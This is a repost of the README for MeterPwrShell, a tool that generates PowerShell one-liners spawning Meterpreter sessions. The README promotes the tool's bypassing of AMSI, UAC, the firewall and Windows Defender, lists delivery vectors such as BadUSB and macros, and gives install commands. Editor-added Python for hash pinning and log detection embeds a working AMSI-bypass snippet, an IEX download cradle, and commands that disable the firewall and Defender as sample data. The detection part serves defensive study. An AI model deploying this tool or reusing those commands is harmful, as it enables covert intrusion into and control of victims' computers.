Channel: KitPloit - PenTest Tools!

MeterPwrShell - Automated Tool That Generates The Perfect PowerShell Payload



Automated tool that generates a PowerShell one-liner which spawns a Meterpreter session on Metasploit, bypasses AMSI, bypasses the Windows Firewall, bypasses UAC, and, according to the author's testing, evades AV products.

This tool is powered by Metasploit Framework (payload generation and handler) and amsi.fail (obfuscated AMSI bypass snippets).


Notes
  • NEVER UPLOAD A PAYLOAD GENERATED BY THIS PROGRAM TO ANY ONLINE SCANNER (multi-engine scanners share samples with AV vendors, which burns the payload)
  • NEVER USE THIS PROGRAM FOR MALICIOUS PURPOSES
  • SPREADING A PAYLOAD GENERATED BY THIS PROGRAM IS NOT COOL
  • ANY DAMAGE CAUSED BY THIS PROGRAM IS NOT MY (the program maker's) RESPONSIBILITY!!!
  • If you have a feature recommendation, post it as an Issue
  • If you have an issue with the program, try redownloading it (trust me), because sometimes I edit the release and fix it without announcing it
  • If you want to know how my payload bypasses AVs, you can check this and this
  • Don't bother forking this repository; forks do not get the releases!

Features (v1.5.1)
  • Bypass UAC
  • Automatic migration (using Metasploit's PrependMigrate option)
  • Built-in getsystem (if you use the Bypass UAC option)
  • Disable all firewall profiles (if you use the Bypass UAC option)
  • Fully bypass Windows Defender real-time protection (if you choose the shortened payload, use Bypass UAC, or both)
  • Disable Windows Defender security features (if you use the Bypass UAC option)
  • Fully unkillable payload
  • Bypasses AMSI (if you choose the shortened payload)
  • Short one-liner (if you choose the shortened payload)
  • Bypass Firewall (if you pick a stageless, i.e. unstaged, payload)
  • Great CLI
  • And more (try it yourself)

All payload features were tested on Windows 10 v20H2.

Advantages of MeterPwrShell compared to the web_delivery module from Metasploit Framework
  • Shorter stager (a short one-liner in this case)
  • Various AMSI bypass techniques and code
  • No need to set up a server for the stager
  • Built-in Ngrok support (so the victim does not need to be on the same local network)
  • Automatic built-in privilege escalation
  • Easily bypasses Windows Defender

Thanks to
  • Every single one of my Discord friends
  • Special thanks to theia#8536 on Discord
  • @FuzzySec for that awesome Masquerade-PEB script
  • @decoder-it for that amazing PPID spoofing script
  • Me, for not dying while creating this tool
  • Ed Wilson, AKA the Microsoft Scripting Guy, for the great PowerShell scripting tutorials
  • And last, Emeric Nasi for the research on bypassing AV dynamic analysis

Requirements
  • Kali Linux, Ubuntu, or Debian (the tool will not work on any other distribution!!!)
  • Metasploit Framework
  • Internet connection (on both the attacker and the victim machine)

Installation
apt update && apt install wget
mkdir MeterPwrShell
cd MeterPwrShell && wget https://github.com/GetRektBoy724/MeterPwrShell/releases/download/v1.5.1/meterpwrshellexec
chmod +x meterpwrshellexec
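The author states above that release files are sometimes edited in place, and no checksum is published for meterpwrshellexec, so the bytes behind the release URL can change without a version bump. The check below is an editor-added example, not part of MeterPwrShell: on first download you inspect the binary and record its SHA-256 yourself; later downloads are refused unless they still match. The pin file name and the stand-in file contents in the self-check are the editor's own assumptions.

```python
from __future__ import annotations

import hashlib
import hmac
import os
import stat
import tempfile
import urllib.request

# Release URL from the Installation section above.
RELEASE_URL = ("https://github.com/GetRektBoy724/MeterPwrShell/releases/download/"
               "v1.5.1/meterpwrshellexec")


def sha256_of(path: str) -> str:
    """Hex SHA-256 of a file, hashed in chunks so a large binary is not read into memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def pin_file(path: str, pin_path: str) -> str:
    """Record the hash of a binary you have already inspected; returns the hash."""
    digest = sha256_of(path)
    with open(pin_path, "w") as f:
        f.write(digest + "\n")
    return digest


def verify_pinned(path: str, pin_path: str) -> bool:
    """True only if the file on disk still hashes to the pinned value."""
    with open(pin_path) as f:
        expected = f.read().strip()
    return hmac.compare_digest(expected, sha256_of(path))


def fetch_and_verify(pin_path: str, out_path: str = "meterpwrshellexec") -> bool:
    """Download the release and mark it executable only if it matches the pin.
    Needs network access; not exercised by the offline self-check below."""
    urllib.request.urlretrieve(RELEASE_URL, out_path)
    if not verify_pinned(out_path, pin_path):
        os.remove(out_path)  # do not leave an unreviewed binary on disk
        return False
    os.chmod(out_path, os.stat(out_path).st_mode | stat.S_IXUSR)
    return True


def selfcheck() -> tuple:
    """Offline demo: pin a file, confirm it verifies, then simulate the release
    being edited in place at the same URL and confirm verification now fails."""
    with tempfile.TemporaryDirectory() as d:
        binary = os.path.join(d, "meterpwrshellexec")
        pin = os.path.join(d, "meterpwrshellexec.sha256")  # editor's pin file name
        with open(binary, "wb") as f:
            f.write(b"release as reviewed")          # constructed stand-in content
        pin_file(binary, pin)
        before = verify_pinned(binary, pin)
        with open(binary, "wb") as f:
            f.write(b"release edited in place")      # same URL, different bytes
        after = verify_pinned(binary, pin)
    return before, after


if __name__ == "__main__":
    print(selfcheck())  # (True, False)
```

Run `pin_file("meterpwrshellexec", "meterpwrshellexec.sha256")` once after you have looked at the binary you downloaded with the wget line above; from then on use `fetch_and_verify("meterpwrshellexec.sha256")` instead of a bare wget, and treat a mismatch as a signal to re-review the new release rather than to re-pin blindly.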

Usage
# ./meterpwrshellexec -c help
Available arguments : help, version, showbanner, showlastdebuglog, disablerootdetector, disableinternetdetector, disablealldetector
help : Show this page
version : Show MeterPwrShell's version
showbanner : Show MeterPwrShell's banner
showlastdebuglog : Show the last debug log
disablerootdetector : Disable the check that the tool is running as root
disableinternetdetector : Disable the internet-connectivity check
disablealldetector : Disable all detectors except the Linux distribution detector

You can also run MeterPwrShell without any flags or arguments.


Attack Vectors
  • BadUSB devices
  • Malicious shortcuts (lnk2pwn)
  • Document macro payloads
  • Microsoft Office DDE
  • The extreme way: type it in yourself
  • Any exploit or vulnerability that lets you execute a command on the victim
  • I've run out of ideas

To-do List

Available feature options
  • Bypass AMSI
  • Shortened payload, AKA the IEX WebClient method (requires the Bypass AMSI option)
  • Bypass UAC (requires the shortened payload / IEX WebClient method)
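The Features list and the feature options above describe four behaviours a defender can look for in PowerShell Script Block Logging (Event ID 4104): an IEX/WebClient download cradle, AMSI tampering, disabling all firewall profiles, and disabling Defender features. The scanner below is an editor-added example, not code from MeterPwrShell: the page does not show the generated payload, so the regexes are the editor's generic signatures for each technique family rather than strings known to appear in this tool's output, and the log records are constructed for the demo.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# One indicator class per technique family named on this page. "all" means every
# pattern must match in the same block (a cradle is IEX *and* a download call);
# "any" means one match is enough. Editor's generic signatures, not the tool's strings.
INDICATORS = {
    "download_cradle": ("all", [
        re.compile(r"\b(IEX|Invoke-Expression)\b", re.I),
        re.compile(r"(Net\.WebClient|DownloadString|DownloadFile|"
                   r"Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b)", re.I),
    ]),
    "amsi_tamper": ("any", [
        re.compile(r"(amsiInitFailed|AmsiUtils|AmsiScanBuffer|amsi\.dll|AmsiContext)", re.I),
    ]),
    "firewall_disable": ("any", [
        re.compile(r"netsh\s+advfirewall\s+set\s+\w+\s+state\s+off", re.I),
        re.compile(r"Set-NetFirewallProfile\b.*-Enabled\s+(False|0)\b", re.I),
    ]),
    "defender_disable": ("any", [
        re.compile(r"Set-MpPreference\b.*-Disable\w+\s+\$?true\b", re.I),
    ]),
}


@dataclass
class ScriptBlockEvent:
    """Minimal view of a PowerShell 4104 (Script Block Logging) record."""
    record_id: int
    user: str
    script: str


# Constructed sample records for the demo; not real telemetry.
SAMPLE_EVENTS = [
    ScriptBlockEvent(1, "CORP\\alice", r"Get-ChildItem C:\Users | Measure-Object"),
    ScriptBlockEvent(2, "CORP\\alice",
        "IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1:8080/s')"),
    ScriptBlockEvent(3, "CORP\\alice",
        "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')"
        ".GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)"),
    ScriptBlockEvent(4, "CORP\\alice",
        "netsh advfirewall set allprofiles state off; "
        "Set-MpPreference -DisableRealtimeMonitoring $true"),
    ScriptBlockEvent(5, "CORP\\bob",  # legitimate download, no IEX: must not fire
        "Invoke-WebRequest -Uri https://example.invalid/r.csv -OutFile r.csv"),
]


def classify(script: str) -> list[str]:
    """Return the indicator classes a single script block triggers, in INDICATORS order."""
    hits = []
    for name, (mode, patterns) in INDICATORS.items():
        results = [p.search(script) is not None for p in patterns]
        if (all(results) if mode == "all" else any(results)):
            hits.append(name)
    return hits


def scan(events: list[ScriptBlockEvent]) -> dict[int, list[str]]:
    """record_id -> triggered classes, for every event that triggers at least one."""
    return {e.record_id: hits for e in events if (hits := classify(e.script))}


def suspicious_users(events: list[ScriptBlockEvent], min_classes: int = 2) -> set[str]:
    """Users whose blocks together cover at least min_classes distinct classes.
    A cradle alone is noisy in admin-heavy estates; a cradle followed by AMSI
    tampering or firewall/Defender changes from the same user is the chain the
    feature list above describes."""
    per_user: dict[str, set[str]] = {}
    for e in events:
        per_user.setdefault(e.user, set()).update(classify(e.script))
    return {u for u, classes in per_user.items() if len(classes) >= min_classes}


if __name__ == "__main__":
    for rid, hits in scan(SAMPLE_EVENTS).items():
        print(f"record {rid}: {', '.join(hits)}")
    print("users to triage:", sorted(suspicious_users(SAMPLE_EVENTS)))
```

Two caveats. amsi.fail snippets are string-obfuscated, so the amsi_tamper patterns will usually miss the first stage as typed; Script Block Logging, however, records the decoded code as its own 4104 block once IEX executes it, so the cradle class and the per-user correlation are what to alert on, and AMSI/ETW telemetry rather than string matching is the durable control. The UAC bypass and PrependMigrate features leave little in script text at all; migration is a cross-process injection and shows up in process-access and remote-thread telemetry (for example Sysmon events 8 and 10), not in 4104.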


